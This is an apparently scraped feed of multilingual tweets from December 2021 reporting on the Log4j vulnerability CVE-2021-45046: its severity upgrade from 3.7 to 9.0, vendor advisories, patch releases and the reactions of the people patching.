2021-12-17 12:01:09果てしないな。 > JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/dAhGpYJc54 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/masayuki_koba
2021-12-17 12:00:08CVE-2021-45046が、dosだけじゃなくてrceも可能になりました。 更に祭りです。 ちなみにjvmオプションによる回避も出来ないらしいです(泣)seyama77
2021-12-17 11:40:50CVE-2021-45046 is now rated as critical 9.0 instead of moderate 3.7 #log4j #Log4ShellLoozak1337
2021-12-17 11:40:29#software Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046)… https://t.co/Yy4Zu36X9w https://twitter.com/i/web/status/1471805887920709634softwaremars
2021-12-17 11:31:31NVD - CVE-2021-45046 ( ゚д゚) https://t.co/6bMQdTT6G2 https://nvd.nist.gov/vuln/detail/CVE-2021-45046st_mouton
2021-12-17 11:31:06というわけで旅行中止です!!!(2回目)。 CVE-2021-45046 に気づくのが遅れたおれが全部悪い。 log4j2.formatMsgNoLookups=true もつけておけともう少し徹底しておくべきだったのが反省点。ktgohan
2021-12-17 11:31:02CVE-2021-45046については一部特定の場合においてはRCE可能に変更されている ※RCE可能なことを検証済は現時点ではmacOSのみ 実際に運用してるわけではないのでContext Lookup(ctx)でのログ出力の利… https://t.co/zQem7xP29C https://twitter.com/i/web/status/1471802803844952066t26_gci
2021-12-17 11:29:12Log4Shell : Severity Upgraded to CVSS 9.0 for Second log4j Vulnerability (CVE-2021-45046) #Log4j #Log4Shell https://t.co/ugwAYA3jrd https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/sebastienfrpro
2021-12-17 11:27:06CVE-2021-45046) has been upgraded from a CVSS score of 3.7 (limited DOS) to a CVSS score of 9.0 (limited RCE)… https://t.co/24LpmtdpNF https://twitter.com/i/web/status/1471801881777352711rubberquacky
2021-12-17 11:24:195th update with new info on CVE-2021-45046. This is a continuously developing situation and it can be overwhelmin… https://t.co/aN1VePvrDF https://twitter.com/i/web/status/1471801984625909770_saadk
2021-12-17 11:15:03JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE やめれ…やめれ……… https://t.co/mwS98HKPFe https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/st_mouton
2021-12-17 11:13:37@GossiTheDog CVE-2021-45046 is being exploited itw, see https://t.co/L3mjRhW63g https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/artem_i_baranov
2021-12-17 10:58:46CVE-2021-45046関連も対応終わったなり。iriyak
2021-12-17 10:55:56Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) https://t.co/U4CH6slrgE https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/netalexx
2021-12-17 10:54:04Log4j hype check: the new CVE-2021-45046: - only applies in certain *non-default* configurations - remote code exe… https://t.co/38VeShb7EW https://twitter.com/i/web/status/1471791074314276867GossiTheDog
2021-12-17 10:53:02えー、CVE-2021-45046 RCE可能に更新されてる。。また、資料更新しないと。。alka4
2021-12-17 10:51:55Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/OKvXJgW4ky http://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/Securityblog
2021-12-17 10:51:00@hrbrmstr DoS vector on 2.16? Are you referring to CVE-2021-45046? I was under the impression that that was fixed in 2.16lgrangeia
2021-12-17 10:49:06JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/5FHgMOWB2y https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/Ohtsune2nd
2021-12-17 10:44:26Log4j - CVE-2021-45046: https://t.co/05CDFxb8Dq http://www.openwall.com/lists/oss-security/2021/12/14/4LinInfoSec
2021-12-17 10:32:22Log4Shell vulnerability dominate the news . CVE-2021-45046 #log4j #log4jshellfbenmadani
2021-12-17 10:31:32あれ、log4j2の二件目のCVE-2021-45046、3点台からRCEな脆弱性に判定が変わってCVSSのスコアが9.0になってる。 https://t.co/bct1ZrWyaE https://logging.apache.org/log4j/2.x/security.htmlyama_bong
2021-12-17 10:21:48While attackers actively exploiting a second #vulnerability, tracked as CVE-2021-45046, disclosed in the #Log4j lib… https://t.co/zBOfTSAWz0 https://twitter.com/i/web/status/1471785895867174917CyberHues
2021-12-17 10:13:20CERT/CC has released a Log4Shell scanner #Log4j CVE-2021-44228 CVE-2021-45046 https://t.co/zPPu9MJxoU https://t.co/F3O6De6Gfk https://github.com/CERTCC/CVE-2021-44228_scanner https://twitter.com/campuscodi/status/1471472486432845829?s=21argevise
2021-12-17 10:10:27Le correctif pour la CVE-2021-45046 est déjà bypasse La gravité est passée de modérée à critique ;Le score CVSS es… https://t.co/cl3jMckUtY https://twitter.com/i/web/status/1471784711852855300argevise
2021-12-17 10:04:04CVE-2021-45046 Log4j 2.15.0 RCE via bypass the allowedLdapHost and allowedClasses checks https://t.co/12u0753Oma… https://t.co/nWxJu2xcwW https://logging.apache.org/log4j/2.x/security.html https://twitter.com/i/web/status/1471780587996213250chybeta
2021-12-17 10:01:42@wdormann CVE-2021-45046 score is now 9galyc0s
2021-12-17 09:52:40Priporočamo posodobitev #log4j na 2.16, druga ranljivost (CVE-2021-45046) je sedaj tudi RCE! https://t.co/8mQtXlDtR9 https://logging.apache.org/log4j/2.x/security.htmlsicert
2021-12-17 09:52:13So, now CVE-2021-45046 also has been identified to lead to RCE. #log4j is a gift that keeps giving. Reference Lin… https://t.co/SPpffm6FYT https://twitter.com/i/web/status/1471777723097829379cbirajdar22
2021-12-17 09:51:14Apache team updated the CVSS Score of CVE-2021-45046 to 9.0 🤪 🥳 https://t.co/zTw4COmsRN #log4j #log4jshell https://www.cyberkendra.com/2021/12/3rd-vulnerability-on-apache-log4j.htmlcyberkendra
2021-12-17 09:32:13#CVE-2021-45046 got a bump from CVSS:3.7 to CVSS:9 … congratulations. Not addressed on @SonicWall #PSIRT at this point in time.BWC_DE
2021-12-17 09:31:46CVSS Score for #CVE-2021-45046 raised from 3.7 to 9.BWC_DE
2021-12-17 09:31:37@dblevins @jongallimore CVE-2021-45046 is the new kid on the block...uebermodean
2021-12-17 09:30:20CVE-2021-45046のベーススコア上がってるやん、勘弁して死ぬyasakappe
2021-12-17 09:21:05JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/fBgWAE8l8y https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/tamura0425
2021-12-17 09:20:29@nv1t @Lefty_4tw @certbund @HonkHase CVE-2021-44228 vs. CVE-2021-45046, letztere gab es vor 4 Tagen noch nicht, denke ich auch.daniel_reineke
2021-12-17 09:10:32CVE-2021-45046 の修正は含まれていないじゃない…。はやくTableau側からアナウンスが欲しいな~。 I would still recommend upgrading your server and hopeful… https://t.co/fzUOSp7IyM https://twitter.com/i/web/status/1471769338449625090nohoyan
2021-12-17 09:02:02CVE-2021-45046のCVSS、3.7から9.0になりましたねkcirevam2
2021-12-17 08:50:28JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/5y13EPvTrL https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/yuya_it_news
2021-12-17 08:43:01Second #Log4j #Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/NSDbhV40cp https://vapt.me/Log4jVulnomvapt
2021-12-17 08:42:19この1週間のCVE-2021-44228の影響確認で、とりあえずLog4jのcoreを使っているかどうかの確認はできたはずだから、CVE-2021-45046の影響の切り分けはわりとスムースにできるんじゃないかな。知らんけど。cam_i8
2021-12-17 08:40:41CVE-2021-45046「DoS かと思った?残念、RCE ちゃんでした!」 勘弁してくれJangari_nTK
2021-12-17 08:23:07log4j 2.15.0での対応が不十分として2.16.0で修正されたCVE-2021-45046の情報が更新されています。 当初DoSの影響を受けるとされた内容がリモートコード実行に、SeverityもModerateからCri… https://t.co/FIjoh6IURc https://twitter.com/i/web/status/1471753222063026178piyokango
2021-12-17 08:21:38あ、もう一個補足しておくと、このツイートをする3日前(12/10時点)にはLog4jチームに報告していました。 CVE-2021-45046が当初DoSとして評価されてしまったのは、時間が取れずPoCを作れていなかったためというの… https://t.co/EoSwwYVlaw https://twitter.com/i/web/status/1471755082274570240ryotkak
2021-12-17 08:21:25🚨❗️ACHTUNG ❗️🚨 Neue Informationen zur #Schwachstelle CVE-2021-45046 in #log4j: Sie ermöglicht auch #RCE! Der CVSS-S… https://t.co/YN7c2igogE https://twitter.com/i/web/status/1471755394968166406certbund
2021-12-17 08:20:09CVE-2021-45046 The severity increased from Moderate to Critical CVSS Score increased from 3.7 to 9.0 Title chang… https://t.co/qCrZMAh97s https://twitter.com/i/web/status/1471756783886630912OguzhanTopgul
2021-12-17 07:55:06Aus CVE-2021-45046 ist jetzt eine RCE-Schwachstelle geworden (ehemals DoS). #log4j https://t.co/uEWdeWuo4d -#-#-… https://t.co/aEus541cmh https://logging.apache.org/log4j/2.x/security.html#Fixed_in_Log4j_2.12.2_.28Java_7.29_and_Log4j_2.16.0_.28Java_8.29 https://twitter.com/i/web/status/1471748682643132424DFNCERT
2021-12-17 07:54:43CVE-2021-45046、めっちゃパワーアップ(3.7→9.0)してる。 週末を迎えて元気になるの俺と一緒じゃん。Satoooooooooooo
2021-12-17 07:42:35補足しておくと、このツイートはCVE-2021-45046に付随する脆弱性に関しての言及です。 このツイートをした時点では機微な情報が抽出できるだけだと思っていたんですが、CVE-2021-45046を見て再度調査したところRCE… https://t.co/WvF214ptFs https://twitter.com/i/web/status/1471745288159510531ryotkak
2021-12-17 07:41:36#QuickScan: Second #Log4j vulnerability (CVE-2021-45046) ➡️ The flaw allows attackers to execute a DOS attack. ➡️… https://t.co/ZDenxrQjcK https://twitter.com/i/web/status/1471746346423971843niiconsulting
2021-12-17 07:40:53The second exploit CVE-2021-45046 severity is now raised 9.0 instead of the 3.7 Also Apache themselves are saying… https://t.co/kuJwwZ83UC https://twitter.com/i/web/status/1471746747735044098ankit_anubhav
2021-12-17 07:33:20Anyone has seen the demo on "MacOS"? - CVE-2021-45046 - Updated from CVSS 3,7 to 9,0. "remote code execution has be… https://t.co/DEGXyO31lI https://twitter.com/i/web/status/1471743451008012292MrMiniMuli
2021-12-17 07:31:13CVE-2021-45046は確かにlookupされるのは確認したけどRCEに繋げる方法は分からないので続報を待つかknqyf263
2021-12-17 07:14:52CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-17 07:14:03早急に修正パッチが適用されたバージョン2.16.0(Java 8以降用)、2.12.2(Java 7用)にアップデートしましょう! [対策あり]Apache Log4jでDoS攻撃可能な脆弱性(CVE-2021-45046) https://t.co/y9Wl9DAWN1 https://a-zs.net/apache_log4j_vulnerability_2/A_zs_Blog
2021-12-17 07:12:56【Apache Log4jのアップデートが難しい場合】 クラスパスからJndiLookupクラスを削除することでCVE-2021-45046対策が可能です。A_zs_Blog
2021-12-17 07:11:27Apache increased the severity of CVE-2021-45046 from moderate (3.7 CVSS) to a critical (9.0 CVSS) because security… https://t.co/bwGkGjBl5V https://twitter.com/i/web/status/14717386133144412170xDimitris
2021-12-17 07:10:50Updated: CVE-2021-45046 Base CVSS Score changed from 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) to 9.0… https://t.co/FBeoliHCfw https://twitter.com/i/web/status/1471738681644163072ozuma5119
2021-12-17 06:53:56Apache just updated CVE-2021-45046 from CVSS 3.7 to CVSS 9 — from Dos back to RCE! If you wanna console yourself,… https://t.co/aXcJlSez1M https://twitter.com/i/web/status/1471731224729190400srinathsrinivas
2021-12-17 06:52:07CVE-2021-45046くんがCVSS 3.7から9.0になってる https://t.co/YeJmYoY9Kq https://logging.apache.org/log4j/2.x/security.htmlheriet
2021-12-17 06:45:58JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/4o4WjxUCzZ https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/zephel01
2021-12-17 06:45:48CVE-2021-45046がCriticalになって帰ってきた。 https://t.co/O8xqdUI5p2 https://github.com/apache/logging-log4j2/commit/0dc72b936eafdeb61b7b82503dde8c0cdadbca08#diff-457dbda9d8c4b5152ba13997c3266a1df6508a850065771a7f0b764ea9375f60Kengo_TODA
2021-12-17 06:44:49В реализации подстановок JNDI в библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся не… https://t.co/DMarM9fjsO https://twitter.com/i/web/status/1471729988927905794ProHoster_info
2021-12-17 06:20:28JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/GxiQuo9NaL 昨日、追加の脆弱性出てたの見逃してた https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/umino48
2021-12-17 06:10:14Sure looks like Log4j 2.15.x has an RCE. CVE-2021-45046 now has a CVSS of 9.0. https://t.co/iaU4eAQpqa https://logging.apache.org/log4j/2.x/security.htmladamjodonnell
2021-12-17 05:50:48攻撃者が話題のlog4jの脆弱性(CVE-2021-44228)ではない2番目の別の脆弱性(CVE-2021-45046)を悪用しようとしているとCloudflareが警告 44228修正版の2.15.0では45046は修正されて… https://t.co/GYlaISdSbd https://twitter.com/i/web/status/1471715671730180099sen_u
2021-12-17 04:41:33Protection against CVE-2021-45046, the additional Log4j RCE vulnerability https://t.co/8x0itYcvcx 又一個新的 CVE CVE-2… https://t.co/4DhZz5elZo https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/ https://twitter.com/i/web/status/1471699627993083906M157q
2021-12-17 04:00:34お祭りすぎる JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/AeIg1nxJLh https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/na2na_chang
2021-12-17 03:50:25An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/36NpdOgxnl https://twitter.com/i/web/status/1471688483190321152ProductCERT
2021-12-17 03:25:38CVE-2021-45046対応のさらなるアップデートが12/16でリリースされているのでSumo Logic使ってるところは再アップデート必要ですね。 https://t.co/lCkpfpCgSu https://help.sumologic.com/Release-Notes/Collector-Release-Notestokuhy
2021-12-17 03:12:30CVE-2021-45046、緊急リリースした対処が覆されたのは遺憾の極みでございます…… RCEされるわけではないのはまぁマシなんだが……ueyasu
2021-12-17 03:10:37#exploit 1. CVE-2021-45046: Log4j 2.15.0 stills allows for exfiltration of sensitive data https://t.co/RanWq600VG… https://t.co/KnECjLT0hq https://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data https://twitter.com/i/web/status/1471678422917210117ksg93rd
2021-12-17 03:01:33JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/vaJwA51wmf https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/notatall33
2021-12-17 02:21:19JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/LVwqjobTmJ https://t.co/jCvgkpNLwX https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/ https://qiitadon.com/@yumetodo/107459848588307793yumetodo
2021-12-17 02:14:05CVE-2021-45046 のフォローアップも入れて日本語翻訳記事を更新しました。 セキュリティ警告:Apache Solr affected by Apache Log4J CVE-2021-44228 https://t.co/RNrFsEhalV https://www.rondhuit.com/cve-2021-44228-apache-solr-affected-apache-log4j.htmlkojisays
2021-12-17 02:02:08また新たな脆弱性…。 こっちの方がヤバそう? JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/w0lcVwlVnw https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/yussan101
2021-12-17 01:12:30Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/jeIHl7T5TG #cybersecurity #infosec http://dlvr.it/SFX0BMjtruglio
2021-12-17 01:04:28JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE こういうの毎回思うんだけど、肝心の最新バージョンのURLと、アップデ… https://t.co/Z99aT3q8Or https://twitter.com/i/web/status/1471644352711892993SkyYakinori
2021-12-17 01:04:00A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/ubgNVUzHlY https://twitter.com/i/web/status/1471644574770737152S3ConsultingLLC
2021-12-17 00:50:39Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) - https://t.co/USlGzo3noH 'Sicherheitsforscher haben… https://t.co/0qofkynPzl https://tarnkappe.info/log4shell-patch-per-exploit-cve-2021-44228-cve-2021-45046 https://twitter.com/i/web/status/1471643619652251656vform
2021-12-17 00:20:36Claris FileMaker ServerにはLog4j2に起因する脆弱性(CVE-2021-44228およびCVE-2021-45046)の影響はないことが確認されましたが、FMプランでは念のため別の危険性を低減するための緩… https://t.co/S1b2sUgYVt https://twitter.com/i/web/status/1471636079300460546matsuo_atsushi
2021-12-16 23:43:30JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/q7iYCfbSdn https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/khmlpy
2021-12-16 23:21:19Apache Log4j 2 Vulnerability (CVE-2021-44228) & (CVE-2021-45046) #inFoSEC #CyberSecurity #inFormationSecurity… https://t.co/1ZfSbJN33I https://twitter.com/i/web/status/14716206870225059883XS0
2021-12-16 23:20:11🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/esr6mxnKg1 https://twitter.com/i/web/status/1471621047858438145threatintelctr
2021-12-16 23:12:35Log4j 2.15.0には、特定の状況下での機微情報流出につながる脆弱性があるとセキュリティ企業Praetorian社。Log4Shell (CVE-2021-44228)及びCVE-2021-45046とは別の3件目。脆弱性の… https://t.co/zsZkL7H19f https://twitter.com/i/web/status/1471616672436199425__kokumoto
2021-12-16 23:00:18[- Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) -] https://t.co/WYlZMXIck8 #ITsec #sicherheit https://ift.tt/3maWx2Jitsecdump
2021-12-16 22:31:25@VixusFoxy don't worry, it's just mutating... CVE-2021-45046Chakat_Deirdre
2021-12-16 22:27:40📬 Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison… https://t.co/E76wL21rD3 https://twitter.com/i/web/status/1471605561833754625tarnkappe_info
2021-12-16 22:25:40📬 Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison… https://t.co/qkrmEW2Nzg https://twitter.com/i/web/status/1471605562945196032lsobiraj
2021-12-16 22:21:15A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/8DCW7DZiat https://twitter.com/i/web/status/1471606077099757570TraceFireSecure
2021-12-16 21:54:09A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/wMDFyAiSzo https://twitter.com/i/web/status/1471596507069652993HackerInsider
2021-12-16 21:28:53A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/4Uub4bQpsD https://twitter.com/i/web/status/1471588513099522053ptrancyber
2021-12-16 21:27:43Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/b5vDtH6hZm… https://t.co/qAxuy3gvfe https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html https://twitter.com/i/web/status/1471588888183455745AJBlackston
2021-12-16 21:27:24@graylog2 Have you patched CVE-2021-45046 yet?technick
2021-12-16 21:27:04A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/cGuba1YoTC https://twitter.com/i/web/status/1471588971532754953JohannaBaumS3
2021-12-16 21:26:26A third new #log4j #vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to car… https://t.co/oKJszvti5P https://twitter.com/i/web/status/1471589097710002178InferSight
2021-12-16 21:13:52Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/t0nyy4TeGs https://twitter.com/i/web/status/1471585997628620804torsity_intel
2021-12-16 20:56:21おかわりだな🤔 IPSでブロック済みではあるが… JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/GBtJ9fxG20 https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/imp555sti
2021-12-16 20:56:02Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/vLX00GRSEV https://twitter.com/i/web/status/1471581911160016898Sociabilidad
2021-12-16 20:55:43Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/CQtFYBayoR https://twitter.com/i/web/status/1471581920140029953AcooEdi
2021-12-16 20:31:48The IBM lab has just updated, the 2nd vulnerability CVE-2021-45046 is addressed in a separate special build (Db2 11… https://t.co/uJChy4lHba https://twitter.com/i/web/status/1471577407299674114jc_mueller
2021-12-16 20:31:352nd Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released. Read this article and other cybersecurity… https://t.co/xlQz6hhgyy https://twitter.com/i/web/status/1471577467932532745ingallsinfosec
2021-12-16 20:22:15⚠️ Se ha reportado un nuevo CVE-2021-45046 que afecta a la actualización 2.15.x de Log4j que corregía el CVE-2021-4… https://t.co/ZYYbsTty8d https://twitter.com/i/web/status/1471574149273460739CERTpy
2021-12-16 20:18:31#log4j be like DJ Khaled !!! CVE-2021-44228 , CVE-2021-45046 aaaand CVE-2021-4104 ! https://t.co/sqdvuq42Cxsagardhanrale
2021-12-16 20:17:57⚠️Updated 10/16/21 for CVE-2021-45046⚠️ OpenNMS Products Affected by Apache Log4j Vulnerability CVE-2021-44228… https://t.co/fdRi0Rmv1A https://twitter.com/i/web/status/1471571471738753025opennms
2021-12-16 20:15:42#OpenSearch 1.2.2 is now available - as advised in CVE-2021-45046, #Log4j has been updated to 2.16.0… https://t.co/SoSiOq3J4c https://twitter.com/i/web/status/1471571863348383744KrisFreedain
2021-12-16 19:52:29Neo4j 4.4.2, 4.3.9, 4.2.13がリリースされました。CVE-2021-45046の脆弱性対応 Apache Log4j 2.16.0 にアップデート。対応が早い。#Neo4j #log4jkojiannoura
2021-12-16 19:44:55Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-16 19:44:47Details of CVE-2021-44228 & CVE-2021-45046, the two new Log4j vulnerabilities affecting millions of devices https://t.co/R5MlmIr6iK https://ift.tt/3yxDcgOAlexaGm33043450
2021-12-16 19:33:41Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide https://t.co/ikusLjfdRV https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ICS_Mikko
2021-12-16 19:02:13URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for th… https://t.co/d1l96n292F https://twitter.com/i/web/status/1471553544545357834thedrcbird
2021-12-16 18:31:34CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-16 18:21:56@SlackHQ I don't see a response or tweet, can you confirm if you are affected by CVE-2021-45046 (Log4j)? If so, ple… https://t.co/VSgP0ch9bw https://twitter.com/i/web/status/1471544632718905355Austin_Chaney
2021-12-16 18:00:21Keeping you updated on #Log4Shell and a new contender, CVE-2021-45046 (CVSS 3.7) https://t.co/jD6miyX7of https://www.elastic.co/blog/analysis-of-log4shell-cve-2021-45046JakeKing
2021-12-16 17:51:37#Cibersegruidad #infosec #seguridad Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de… https://t.co/JBgRV37TWv https://twitter.com/i/web/status/1471537349209165827iicsorg
2021-12-16 17:51:18#infosec #cybersecurity #hacking #security Details of CVE-2021-44228 & CVE-2021-45046, the two new Log4j vulnerabil… https://t.co/qwYiETqMEm https://twitter.com/i/web/status/1471537560220356609iicsorg
2021-12-16 17:40:09Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/B7hgfWElTq https://bit.ly/3F2WjluCwealthSentinel
2021-12-16 17:32:09JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/QWMQju60Vd https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/toruneshio
2021-12-16 17:14:55Trustwave is actively responding to Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046. We are regularly updat… https://t.co/XxXMTYeDXU https://twitter.com/i/web/status/1471525850742931465DougOlenick
2021-12-16 16:50:35@KorbenD_Intel @campuscodi The CVE text for CVE-2021-45046 unfortunately describes the impact ONLY for log4j 2.15 (… https://t.co/iiKOkzH76R https://twitter.com/i/web/status/1471522903963353095wdormann
2021-12-16 16:41:24Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/RKUm9RkLWA via… https://t.co/SZu3TAAuyy https://buff.ly/3oTpaDe https://twitter.com/i/web/status/1471520004487135241Unidev
2021-12-16 16:30:36JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/JLBgjEEGCu https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/molisoba
2021-12-16 16:19:12CVE-2021-45046 is vulnerable when attackers can control **non-message** parts of the pattern layout. Here are some examples 🧵pwntester
2021-12-16 16:02:21As CVE-2021-45046 is out for quite some time now, this is a bit disapointing.felix_eckhardt
2021-12-16 15:33:40JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE https://t.co/ALYS5Dlq8F https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/q_s3n
2021-12-16 15:10:20UPTDATE (16.12.2021): Ha sido revelada la nueva vulnerabilidad CVE-2021-45046 , tercera con referencia a la librerí… https://t.co/L1hSPkGYbz https://twitter.com/i/web/status/1471497739212976130Keplerlatam
2021-12-16 15:00:35Read our 2nd of 2 new customer alerts about #log4j. CVE-2021-45046 explains how Log4j v2.15.0 from Apache was incom… https://t.co/5RYpAiZBwO https://twitter.com/i/web/status/1471495195237642257waratek
2021-12-16 15:00:35so >CVE-2021-45046 "it was found that the fix for apache log4j was incomplete." and "WILL RESULT IN A DENIAL OF SERVICE ATTACK." lmao fucktoolboxybrown
2021-12-16 14:59:23JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/E47R3VuaWk https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/norinori1103
2021-12-16 14:55:54⚠️ Llueve sobre mojado. Atacantes han comenzado a explotar la segunda vulnerabilidad #Log4J (CVE-2021-45046), mien… https://t.co/MUIv9ECnuR https://twitter.com/i/web/status/1471492321564782595jpcarsi
2021-12-16 14:52:59🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/d8iANQbQlR https://twitter.com/i/web/status/1471492699328901124threatintelctr
2021-12-16 14:33:40@tsukkkkkun 一応補足しておくと、完全にデフォルトの設定では刺さりません。 %m{lookups}を指定するか、CVE-2021-45046等の方法でLookupを発生させる必要がありますryotkak
2021-12-16 14:33:20JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/TPw1gyjRZd http://dlvr.it/SFVFv7hatebusecurity
2021-12-16 14:23:24JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - GIGAZINE - https://t.co/0sQuW5xtyJ https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/AoiKagase
2021-12-16 14:12:30JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 https://t.co/OQ6kjXr2TM https://gigazine.net/news/20211216-log4j-log4shell-cve-2021-45046/kirimemo
2021-12-16 14:10:24Log4j Important: Security Vulnerability CVE-2021-45046 (Log4shell) has been addressed as a high-security risk. #ln #log4j2zana_ali
